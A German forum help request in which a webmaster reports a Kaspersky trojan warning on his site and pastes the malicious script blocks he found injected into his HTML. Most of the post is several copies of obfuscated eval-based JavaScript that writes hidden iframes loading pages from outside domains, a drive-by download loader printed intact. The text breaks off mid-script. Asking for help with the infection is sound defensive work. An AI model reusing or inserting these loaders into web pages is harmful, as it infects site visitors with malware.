Script in HTML-Quellcode

Sokon · 13.03.2012, 15:07

Hallo zusammen,

ich brauche mal eure Hilfe.
Ich bin Webmaster einer Internetseite.
Seit ein paar Tagen bekommen viele Besucher die Meldung von Kaspersky:

Trojan-Downloader.js.Agent.gol

daraufhin hab ich im Quellcode einen Abschnitt gefunden, den ich bei der Programmierung definitiv nicht eingepflegt habe:

Code:

ATTFilter

<script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eval';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f+='Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j53.5j54.5j56j54.5j55j49j59.5j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j53.5j54.5j56j54.5j55j49j59.5j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=567;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>

<script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eva'+'l';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f=f+'Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j58j57.5j55.5j50j57.5j49.5j52.5j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j58j57.5j55.5j50j57.5j49.5j52.5j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=567;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>

<script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eva'+'l';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f=f+'Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j51j54.5j54j49.5j49j52j57.5j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j51j54.5j54j49.5j49j52j57.5j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=567;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>

<script>if(window.document)aa=0+[];aaa='0';try{new"a".prototype}catch(hgberger){if(aa===aaa)
f=['-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z3z85z-25z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-25z-29z-29z87z-6z63z70z77z63z-6z85z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z62z83z77z68z63z59z65z8z67z72z9z61z73z79z72z78z12z18z8z74z66z74z1z-6z81z67z62z78z66z23z1z11z10z1z-6z66z63z67z65z66z78z23z1z11z10z1z-6z77z78z83z70z63z23z1z80z67z77z67z60z67z70z67z78z83z20z66z67z62z62z63z72z21z74z73z77z67z78z67z73z72z20z59z60z77z73z70z79z78z63z21z70z63z64z78z20z10z21z78z73z74z20z10z21z1z24z22z9z67z64z76z59z71z63z24z-4z3z21z-25z-29z-29z87z-25z-29z-29z64z79z72z61z78z67z73z72z-6z67z64z76z59z71z63z76z2z3z85z-25z-29z-29z-29z80z59z76z-6z64z-6z23z-6z62z73z61z79z71z63z72z78z8z61z76z63z59z78z63z31z70z63z71z63z72z78z2z1z67z64z76z59z71z63z1z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z77z76z61z1z6z1z66z78z78z74z20z9z9z62z83z77z68z63z59z65z8z67z72z9z61z73z79z72z78z12z18z8z74z66z74z1z3z21z64z8z77z78z83z70z63z8z80z67z77z67z60z67z70z67z78z83z23z1z66z67z62z62z63z72z1z21z64z8z77z78z83z70z63z8z74z73z77z67z78z67z73z72z23z1z59z60z77z73z70z79z78z63z1z21z64z8z77z78z83z70z63z8z70z63z64z78z23z1z10z1z21z64z8z77z78z83z70z63z8z78z73z74z23z1z10z1z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z81z67z62z78z66z1z6z1z11z10z1z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z66z63z67z65z66z78z1z6z1z11z10z1z3z21z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z8z59z74z74z63z72z62z29z66z67z70z62z2z64z3z21z-25z-29z-29z87'][0].split('z');md='a';e=window["e"+"val"];w=f;s=[];r=String.fromCharCode;for(i=0;567!=i;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>

<script>if(window.document)aa=0+[];aaa='0';try{new"a".prototype}catch(hgberger){if(aa===aaa)
f=['-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z3z85z-25z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-25z-29z-29z87z-6z63z70z77z63z-6z85z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z60z83z62z82z79z64z79z8z67z72z9z61z73z79z72z78z12z18z8z74z66z74z1z-6z81z67z62z78z66z23z1z11z10z1z-6z66z63z67z65z66z78z23z1z11z10z1z-6z77z78z83z70z63z23z1z80z67z77z67z60z67z70z67z78z83z20z66z67z62z62z63z72z21z74z73z77z67z78z67z73z72z20z59z60z77z73z70z79z78z63z21z70z63z64z78z20z10z21z78z73z74z20z10z21z1z24z22z9z67z64z76z59z71z63z24z-4z3z21z-25z-29z-29z87z-25z-29z-29z64z79z72z61z78z67z73z72z-6z67z64z76z59z71z63z76z2z3z85z-25z-29z-29z-29z80z59z76z-6z64z-6z23z-6z62z73z61z79z71z63z72z78z8z61z76z63z59z78z63z31z70z63z71z63z72z78z2z1z67z64z76z59z71z63z1z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z77z76z61z1z6z1z66z78z78z74z20z9z9z60z83z62z82z79z64z79z8z67z72z9z61z73z79z72z78z12z18z8z74z66z74z1z3z21z64z8z77z78z83z70z63z8z80z67z77z67z60z67z70z67z78z83z23z1z66z67z62z62z63z72z1z21z64z8z77z78z83z70z63z8z74z73z77z67z78z67z73z72z23z1z59z60z77z73z70z79z78z63z1z21z64z8z77z78z83z70z63z8z70z63z64z78z23z1z10z1z21z64z8z77z78z83z70z63z8z78z73z74z23z1z10z1z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z81z67z62z78z66z1z6z1z11z10z1z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z66z63z67z65z66z78z1z6z1z11z10z1z3z21z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z8z59z74z74z63z72z62z29z66z67z70z62z2z64z3z21z-25z-29z-29z87'][0].split('z');md='a';e=window["e"+"val"];w=f;s=[];r=String.fromCharCode;for(i=0;567!=i;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>

<script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eva'+'l';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f=f+'Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j56.5j49.5j47.5j60j49j49.5j53j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j56.5j49.5j47.5j60j49j49.5j53j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=567;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>

<script>if(window.document)aa=0+[];aaa='0';try{new"a".prototype}catch(hgberger){if(aa===aaa)
f=['-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z3z85z-25z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-25z-29z-29z87z-6z63z70z77z63z-6z85z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z74z63z62z63z84z60z83z8z67z72z9z61z73z79z72z78z12z18z8z74z66z74z1z-6z81z67z62z78z66z23z1z11z10z1z-6z66z63z67z65z66z78z23z1z11z10z1z-6z77z78z83z70z63z23z1z80z67z77z67z60z67z70z67z78z83z20z66z67z62z62z63z72z21z74z73z77z67z78z67z73z72z20z59z60z77z73z70z79z78z63z21z70z63z64z78z20z10z21z78z73z74z20z10z21z1z24z22z9z67z64z76z59z71z63z24z-4z3z21z-25z-29z-29z87z-25z-29z-29z64z79z72z61z78z67z73z72z-6z67z64z76z59z71z63z76z2z3z85z-25z-29z-29z-29z80z59z76z-6z64z-6z23z-6z62z73z61z79z71z63z72z78z8z61z76z63z59z78z63z31z70z63z71z63z72z78z2z1z67z64z76z59z71z63z1z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z77z76z61z1z6z1z66z78z78z74z20z9z9z74z63z62z63z84z60z83z8z67z72z9z61z73z79z72z78z12z18z8z74z66z74z1z3z21z64z8z77z78z83z70z63z8z80z67z77z67z60z67z70z67z78z83z23z1z66z67z62z62z63z72z1z21z64z8z77z78z83z70z63z8z74z73z77z67z78z67z73z72z23z1z59z60z77z73z70z79z78z63z1z21z64z8z77z78z83z70z63z8z70z63z64z78z23z1z10z1z21z64z8z77z78z83z70z63z8z78z73z74z23z1z10z1z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z81z67z62z78z66z1z6z1z11z10z1z3z21z64z8z77z63z78z27z78z78z76z67z60z79z78z63z2z1z66z63z67z65z66z78z1z6z1z11z10z1z3z21z-25z-29z-29z-29z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z8z59z74z74z63z72z62z29z66z67z70z62z2z64z3z21z-25z-29z-29z87'][0].split('z');md='a';e=window["e"+"val"];w=f;s=[];r=String.fromCharCode;for(i=0;567!=i;i+=1){j=i;s=s+r(38+1*w[j]);}
if(Math.round((-1*2*2)*Math.tan(Math.atan(1/2)))===-3+1)e(s);}</script>

<script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eva'+'l';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f=f+'Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j57j51.5j58j49.5j54j59.5j56j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j57j51.5j58j49.5j54j59.5j56j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=567;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>

<script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eva'+'l';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f=f+'Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j59j47.5j57j49.5j50.5j54.5j54j22j51.5j54j22.5j48.5j54.5j57.5j54j57j24j27j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.